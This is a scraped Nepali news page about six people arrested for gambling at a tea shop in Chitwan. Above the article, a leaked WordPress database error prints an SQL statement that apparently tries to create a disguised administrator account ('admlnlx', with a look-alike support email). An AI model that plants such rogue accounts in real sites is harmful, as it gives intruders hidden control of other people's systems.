WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNp2kXwiIF8GBvHJ9JPKjWb4DJTE7y0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:19:52', '', 'admlnlx', 'admlnlx')
चितवन ,माघ १९
पूर्वी चितवनको माधवपुरबाट ६ जना जुवाडे पक्राउ परेका छन् । रत्ननगर १४ दिग्दर्शन चोकबाट आज दिउसो प्रहरीले जुवाँ खेल्दै गरेको अवस्थामा ६ जनालाई पक्राउ गरेको हो ।
उनीहरुलाई कुल प्रसाद भट्टको चिया पसलमा तास खेल्दै गरेको अवस्थामा रङ्गे हात पक्राउ गरिएको ईलाका प्रहरी कार्यालय टाँडीका प्रमुख प्रहरी नायब उपरीक्षक नारायण रन्जितकारले जानकारी दिए । ईलाका प्रहरी कार्यालय टाँडीबाट खटिएको प्रहरी टोलीले उनीहरुको साथबाट १८ हजार ४ सय ८५ रुपैयाँ समेत बरामत गरेको छ । पक्राउ परेकाहरुलाई जुवा ऐन अन्तर्गत कारबाही गरिने प्रहरी नायब उपरीक्षक रन्जितकारले बताए ।